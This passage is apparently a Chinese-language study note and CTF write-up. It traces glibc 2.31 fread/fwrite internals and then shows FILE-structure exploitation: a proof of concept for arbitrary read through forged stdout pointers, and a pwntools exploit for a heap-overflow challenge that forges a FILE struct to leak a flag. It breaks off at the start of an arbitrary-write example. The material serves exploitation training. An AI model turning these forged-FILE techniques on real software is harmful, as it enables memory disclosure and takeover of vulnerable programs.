```c
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
```
如果大小不夠就看整個buffer大小夠不夠處理want,可以就進入underflow,進行刷新
```c
if (fp->_IO_buf_base && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)) {
if (__underflow (fp) == EOF)
break;
continue;
}
```
呼叫 __underflow
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L268
```c
int
__underflow (FILE *fp)
{
if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
```
經過簡單檢查後,會呼叫__underflow,這邊會去查vtable,發現對應到_IO_file_underflow
```c
JUMP_INIT(underflow, _IO_file_underflow),
```
_IO_file_underflow實際上呼叫到_IO_new_file_overflow
總之就是檢查
syscall read
然後刷新buffer
以便繼續讀取資料
```c
int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;
/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);
if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);
_IO_release_lock (stdout);
}
_IO_switch_to_get_mode (fp);
/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;
count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
```
這部分是資料量太大的處理,詳情見總結
```c
/* These must be set before the sysread as we might longjmp out
waiting for input. */
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* Try to maintain alignment: read a whole number of blocks. */
count = want;
if (fp->_IO_buf_base)
{
size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}
count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;
break;
}
s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}
return n - want;
```
總結
1. 調用 vtable 中的 _IO_XSGETN (_IO_file_xsgetn)。
1. 如果沒有 buffer,則調用 vtable 中的 _IO_DOALLOCATE (_IO_file_doallocate) 進行分配。
1. 調用 vtable 中的 _IO_SYSSTAT (_IO_file_stat) 查看文件資訊,設置 buffer 大小。
1. 使用 malloc 分配一塊區域作為 buffer。
1. 開始讀取 buffer,見下方
```
1. 當data(n)很小且小於buffer剩餘的data:
流程:
計算當前buffer內剩餘的data have(fp->_IO_read_end - fp->_IO_read_ptr)。
如果 have >= want(也就是buffer內的資料足夠滿足用戶的需求),直接將buffer的資料copy到 data 中,並更新buffer的讀取指標 fp->_IO_read_ptr。
完成資料的copy後,want 會變為 0,結束讀取流程,返回已讀取的data n - want。
簡單流程:
確認buffer內是否有足夠空間(have >= want)。
若是,直接copy資料到buffer並結束。
2. 當data(n)比buffer剩餘的data大,但仍小於buffer的最大容量:
流程:
先copybuffer內的所有資料到 data,並減少 want。
接著檢查 _IO_in_backup(fp),若有備份buffer,則切換至主要的讀取區域,繼續進行資料讀取。
再來,如果 want < (fp->_IO_buf_end - fp->_IO_buf_base),代表剩餘請求的資料比buffer容量還小,則呼叫 __underflow(fp) 補充buffer,再重複上述流程進行讀取。
中等data流程:
先讀取buffer內剩餘的資料。
如果buffer內的資料不足,嘗試補充buffer再讀取。
重複直到滿足使用者的請求或到達文件結尾。
3. 當data(n)很大,超過buffer容量:
流程:
若 want 大於buffer的最大容量,則不再使用buffer,而是直接從系統層級進行讀取,使用 _IO_SYSREAD(fp, s, count)。
在此過程中,為了提升效能,會盡量以對齊的塊數量來讀取資料(通過減少 count 來確保資料是多個完整區塊的大小)。
讀取成功後,更新 want 和 s,繼續讀取剩餘資料。
大data流程:
如果請求的資料超過buffer容量,直接syscall read
反覆呼叫sysycall read直到滿足請求
```
![image](https://hackmd.io/_uploads/B19lqdNhA.png)
### fwrite
其實基本上fwrite前面跟fread一樣,跳呼叫_IO_XSPUTN
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofwrite.c#L53
```c
size_t
_IO_fwrite (const void *buf, size_t size, size_t count, FILE *fp)
{
size_t request = size * count;
size_t written = 0;
CHECK_FILE (fp, 0);
if (request == 0)
return 0;
_IO_acquire_lock (fp);
if (_IO_vtable_offset (fp) != 0 || _IO_fwide (fp, -1) == -1)
written = _IO_sputn (fp, (const char *) buf, request);
_IO_release_lock (fp);
/* We have written all of the input in case the return value indicates
this or EOF is returned. The latter is a special case where we
simply did not manage to flush the buffer. But the data is in the
buffer and therefore written as far as fwrite is concerned. */
if (written == request || written == EOF)
return count;
else
return written / size;
}
libc_hidden_def (_IO_fwrite)
```
_IO_new_file_xsputn
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1196
f: 一個指向文件結構體的指標。
data: 需要寫入的數據指標。
n: 要寫入的數據大小
```c
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
```
s: 將輸入的 data 轉換為字串來處理。
to_do: 要寫入的剩餘字節數,初始值為 n。
must_flush: 是否需要強制刷新buffer的標誌,初始化為 0。
count: 表示buffer中可以立即使用的空間大小。
```c
const char *s = (const char *) data;
size_t to_do = n;
int must_flush = 0;
size_t count = 0;
```
這邊檢查讀入的大小
接下檢查否設置了_IO_LINE_BUF及當前是否處於寫入模式 (_IO_CURRENTLY_PUTTING)。
補充一下,可以分為三類
all buffer -> 填滿了buffer才輸出
line buffer -> 遇到\n才輸出
no buffer -> 沒有buffer,及時輸出
再來會計算當前buffer大小為count
如果buffer大小大於要寫入的剩餘字節數,就檢查是否遇到\n,如果遇到就調整count,並將刷新buffer的flag設為1,強制刷新buffer
如果沒有滿足前面設置的flag,就計算buffer大小
```c
if (n <= 0)
return 0;
/* This is an optimized implementation.
If the amount to be written straddles a block boundary
(or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
else if (f->_IO_write_end > f->_IO_write_ptr)
count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
```
如果buffer有剩下,就將他填滿
將data複製到_IO_write_ptr ~ _IO_write_ptr+count
等待寫的data往後推count
需要寫的減count
```c
if (count > 0)
{
if (count > to_do)
count = to_do;
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
to_do -= count;
}
```
如果還有剩餘,那就代表沒有分配到buffer,或是buffer不夠大,並且也看是否需要刷新buffer,有的話就進去刷新
```c
if (to_do + must_flush > 0)
{
size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
```
接下來這部分就是刷新buffer
他呼叫的 _IO_OVERFLOW 實際上是 _IO_file_overflow
```c
JUMP_INIT(overflow, _IO_file_overflow),
```
_IO_file_overflow 又是 _IO_new_file_overflow
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L730
一樣一段一段看
f 是 FILE
ch 是 EOF
先判斷是否當前是是寫入,不是寫入就進入ERROR
```c
int
_IO_new_file_overflow (FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
```
當前不是寫入或是write base未設置就去設置(大蓋就是去malloc一塊或切換回來)
```c
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup,
f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
```
之後進do_write
從 f->_IO_write_base開始寫長度 f->_IO_write_ptr - f->_IO_write_base
```c
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
```
_IO_do_write 是 _IO_new_do_write
```c
int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
return (to_do == 0
|| (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L430
syscall write
然後
調用 _IO_setg 將 fp 的buffer指針重設為初始狀態。
將 fp->_IO_write_base 和 fp->_IO_write_ptr 設置為buffer的開始地址 fp->_IO_buf_base,表示buffer處於可以重新寫入的狀態。
根據文件的模式(如是否為行緩衝 _IO_LINE_BUF 或不使用緩衝 _IO_UNBUFFERED),調整 fp->_IO_write_end,使其指向buffer的適當結尾
```c
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
size_t count;
if (fp->_flags & _IO_IS_APPENDING) //本來就不會設定
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base) //讀寫位置不一致
{
off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do);
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}
```
寫入量超過一個block就會進入該處理
這邊還有剩餘資料處理
```c
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L370
處理剩餘data
```c
size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)
```
總結
![image](https://hackmd.io/_uploads/rJIUa6q30.png)
1. n <= 0
當data n 小於等於 0 時,程式直接返回 0,不會進行任何操作。
2. data n 小於等於 buffer剩餘空間 (count)
* buffer剩餘空間 (count): 由 f->_IO_write_end - f->_IO_write_ptr 決定buffer剩餘空間大小。
* 當data小於等於剩餘的buffer空間時,程式將資料直接寫入buffer,沒有超出buffer的部分,因此不需要進行syscall write或flush。
* 程式執行流程:
* 計算剩餘的buffer空間 count。
* 將資料完全寫入buffer (__mempcpy 複製資料到 f->_IO_write_ptr)。
更新寫指針 f->_IO_write_ptr。
返回 n,表示成功寫入的資料大小。
3. data n 大於 buffer剩餘空間 (count)
* 當data超過buffer剩餘空間時,程式會首先嘗試填滿buffer,然後將剩餘的部分進行syscall write。
* 步驟:
* 計算剩餘的buffer空間 count,將 count 字節的資料寫入buffer。
* 如果資料剩餘 (to_do > 0),會進行buffer刷新(即調用 _IO_OVERFLOW),並將資料寫入底層文件。
* 嘗試寫入剩餘資料,並根據文件的塊對齊要求優化寫入(維持整塊大小的寫入以提高效能)。
* 剩餘資料由 _IO_default_xsputn 處理,進行最後的寫入操作。
* 返回總共寫入的資料大小。
4. data n 小於等於 buffer剩餘空間,但啟用行緩衝模式 (_IO_LINE_BUF)
行緩衝模式: 如果啟用行緩衝模式且當前正在寫入 (_IO_CURRENTLY_PUTTING),程式會檢查資料中是否包含換行符 ('\n')。
步驟:
* 計算buffer剩餘空間 count。
* 如果data小於等於剩餘空間,則檢查資料中是否包含換行符。
* 如果遇到換行符,設置 must_flush = 1,表示需要立即刷新buffer。
* 將資料寫入buffer直到換行符,然後執行刷新操作。
* 剩餘資料寫入後,返回成功寫入的資料大小。
5. data n 大於 buffer剩餘空間,啟用行緩衝模式
步驟:
* 先將部分資料寫入buffer直到滿。
* 當buffer空間不足時,觸發刷新,並嘗試將資料直接寫入文件。
* 檢查剩餘資料中是否有換行符,遇到換行符時觸發buffer刷新。
* 將剩餘資料按塊大小(block_size)對齊寫入。
* 返回總共寫入的資料大小。
6. data n 超過 block_size
* block_size = f->_IO_buf_end - f->_IO_buf_base,這個大小會決定每次可以寫入的最大數據量。
* 當data超過buffer塊大小時,程式會分成多個塊進行寫入,以保持區塊對齊,並優化 I/O 操作。
* 步驟:
先將部分資料寫入buffer。
buffer滿後,進行buffer刷新。
將剩餘資料按照塊大小進行對齊寫入(即寫入一整數塊的資料,保證效率)。
最後寫入剩下的資料,並更新寫指針。
返回寫入的總資料大小。
## Arbitrary Read
看完上述的source code,其實大概就會有一些如何攻擊的想法,像是如果我們能夠改掉read跟write等pointer,是不是有機會構造任意讀或任意寫
改寫vtable pointer並偽造vtable來做任意跳轉
先看這個POC
```c
#include <stdio.h>
#include <string.h>
// gcc arbitrary_read_puts.c -o arbitrary_read_puts
typedef struct {
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
} _IO_FILE;
int main(void)
{
_IO_FILE *p;
char buf[] = "Programmer: You can't see me\n";
printf("Let's Demo a arbitrary read\n");
p = stdout;
p->_IO_read_end = buf;
p->_IO_write_base = buf;
p->_IO_write_ptr = buf + strlen(buf);
p->_IO_buf_end = buf + strlen(buf);
puts("Hacker: uhhh, but I can\n");
}
```
他會輸出
```
Let's Demo a arbitrary read
Programmer: You can't see me
Hacker: uhhh, but I can
```
為甚麼呢?
還需要繞過甚麼?
### puts IO source code
這邊回去看puts的source code,他會調用xsputn
首先是
flag會被設置,所以會進入到該if
並且計算count
這邊為了方便可以直接讓count=0
> f->_IO_buf_end = f->_IO_write_ptr
```c
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
```
count = 0 不會進去
```c
if (count > 0)
{
if (count > to_do)
count = to_do;
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
to_do -= count;
}
```
to_do初始設為n,大於零(若進入到上方判斷,有機會讓to_do被讀完)
呼叫_IO_OVERFLOW
```c
if (to_do + must_flush > 0)
{
size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
```
stdout 不會設置 _IO_NO_WRITES,不會進
```c
int
_IO_new_file_overflow (FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
```
_IO_CURRENTLY_PUTTING預設有設定,另外_IO_write_base在利用時候,不會為空,所以不會進以下if
```c
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup,
f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
```
進
```c
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
```
_IO_IS_APPENDING 不會設定,不會進
下方的read跟write需要設定成一樣,這樣才不會因為進入該判斷式,去重新定位_IO_write_base,導致利用失敗
> fp->_IO_read_end = fp->_IO_write_base
這樣就繞過
```c
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
```
最後syscall就成功了
所以上方我把該設定的設好,該等於的設好,最後把p->_IO_write_base設定到要讀的地方,結束也設定好,就可以構造任意讀
```
p = stdout;
p->_IO_read_end = buf;
p->_IO_write_base = buf;
p->_IO_write_ptr = buf + strlen(buf);
p->_IO_buf_end = buf + strlen(buf);
```
### 題目
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
// gcc aar.c -o aar -g -no-pie
char flag[0x10] = "FLAG{TEST}\n";
int main()
{
FILE *fp;
char *buf;
buf = malloc(0x10);
fp = fopen("/tmp/meow", "w");
read(0, buf, 0x1000);
fwrite(buf, 0x10, 1, fp);
return 0;
}
```
我們要利用fwrite來做任意讀
fp是在stack上的一個FILE
並且我們有heap overflow,可以去覆蓋FILE *fp來做任意讀
那我們要怎麼偽造
p->_IO_read_end = 想要讀的address;
p->_IO_write_base = 想要讀的address;
p->_IO_write_ptr = 想要讀的address + strlen(想要讀的);
p->_IO_buf_end = 想要讀的address + strlen(想要讀的);
fileno=1 (stdout)
flag = 0x00000800 (_IO_CURRENTLY_PUTTING)
這樣偽造一個FILE struct
然後就是算要蓋多少
buf -> malloc(0x10)實際大小0x20
而open開了一個chunk在heap上,並緊鄰buf
```c
pwndbg> parseheap
addr prev size status fd bk
0x405000 0x0 0x290 Used None None
0x405290 0x0 0x20 Used None None
0x4052b0 0x0 0x1e0 Used None None
```
觀察一下記憶體,就是FILE
```
pwndbg> x/100xg 0x4052b0
0x4052b0: 0x0000000000000000 0x00000000000001e1
0x4052c0: 0x00000000fbad2484 0x0000000000000000
0x4052d0: 0x0000000000000000 0x0000000000000000
0x4052e0: 0x0000000000000000 0x0000000000000000
0x4052f0: 0x0000000000000000 0x0000000000000000
0x405300: 0x0000000000000000 0x0000000000000000
0x405310: 0x0000000000000000 0x0000000000000000
0x405320: 0x0000000000000000 0x00007ffff7e1b6a0
0x405330: 0x0000000000000003 0x0000000000000000
0x405340: 0x0000000000000000 0x00000000004053a0
```
```c
pwndbg> p *fp
$2 = {
_flags = -72539004,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e1b6a0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x4053a0,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x4053b0,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
}
```
當我設定完成
0x0 0x0
0x0 0x1e1
...
p->_IO_read_end = 想要讀的address;
p->_IO_write_base = 想要讀的address;
p->_IO_write_ptr = 想要讀的address + strlen(想要讀的);
p->_IO_buf_end = 想要讀的address + strlen(想要讀的);
fileno=1 (stdout)
flag = 0x00000800 (_IO_CURRENTLY_PUTTING)
後並送出
```python=
from pwn import *
from NAUP_pwn_lib import *
import time
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)
context(arch = 'amd64', os = 'linux')
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
r=process('./aar')
debug_init()
else:
REMOTE_INFO=split_nc("nc naup.com 2000")
REMOTE_IP=REMOTE_INFO[0]
REMOTE_PORT=int(REMOTE_INFO[1])
r=remote(REMOTE_IP,REMOTE_PORT)
### exploit
flag_addr = 0x404050
lock_addr = 0x404a00
padding = flat(0x0,0x0,0x0,0x1e1)
f = FileStructure(0)
f.flags = 0x00000800
f._IO_read_end = flag_addr
f._IO_write_base = flag_addr
f._IO_buf_end = flag_addr + 0x10
f._IO_write_ptr = flag_addr + 0x10
f.fileno = 1
payload = padding + bytes(f)[:-8]
s(payload)
###
ita()
```
爛了,遇事不決,gdb開起來
![image](https://hackmd.io/_uploads/B1kg6Zs2A.png)
他死在這裡rdi+0x8,是個指標
我一個個慢慢測候發現他是 _lock
我隨便將他設成一個合理的address就可以了
其實還有個方法就是不要蓋到_lock,我這邊選擇填一個合法的空address
另外要把vtable切掉,不然動到vtable pointer會吃保護然後crash
exploit
```python=
from pwn import *
from NAUP_pwn_lib import *
import time
from NAUP_filestructure_lib import *
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)
context(arch = 'amd64', os = 'linux')
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
r=process('./aar')
debug_init()
else:
REMOTE_INFO=split_nc("nc naup.com 2000")
REMOTE_IP=REMOTE_INFO[0]
REMOTE_PORT=int(REMOTE_INFO[1])
r=remote(REMOTE_IP,REMOTE_PORT)
### exploit
flag_addr = 0x404050
lock_addr = 0x404a00
padding = flat(0x0,0x0,0x0,0x1e1)
FS = FILESTRUCTURE()
payload = FS.aar(padding, 0x00000800, flag_addr, 0x10, lock_addr)
s(payload)
###
ita()
```
NAUP_filestructure_lib.py
```python=
from pwn import *
class FILESTRUCTURE:
def __init__(self):
self.FS = FileStructure(0)
def aar(self, padding: bytes ,flags: int ,target_addr: int ,size: int ,lock_addr:int ):
self.FS.flags = flags
self.FS._IO_read_end = target_addr
self.FS._IO_write_base = target_addr
self.FS._IO_buf_end = target_addr + size
self.FS._IO_write_ptr = target_addr + size
self.FS._lock = lock_addr
self.FS.fileno = 1
return padding + bytes(self.FS)[:-8]
```
這樣就成功任意讀了
![image](https://hackmd.io/_uploads/B1n6efjhA.png)
## Arbitary write
```c
#include <stdio.h>
#include <string.h>
// gcc arbitrary_write_fread.c -o arbitrary_write_fread
typedef struct {
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
char *_IO_save_base;
char *_IO_backup_base;
char *_IO_save_end;
void *_markers;
void *_chain;
int _fileno;
} IO_FILE;
int main(void)
{
IO_FILE *p;
char target[] = "Programmer: You can't change me\n";
char buf[0x20] = { 0 };
printf("Let's Demo a arbitrary write\n");
p = fopen("fread.txt", "r+");
p->_IO_buf_base = target;
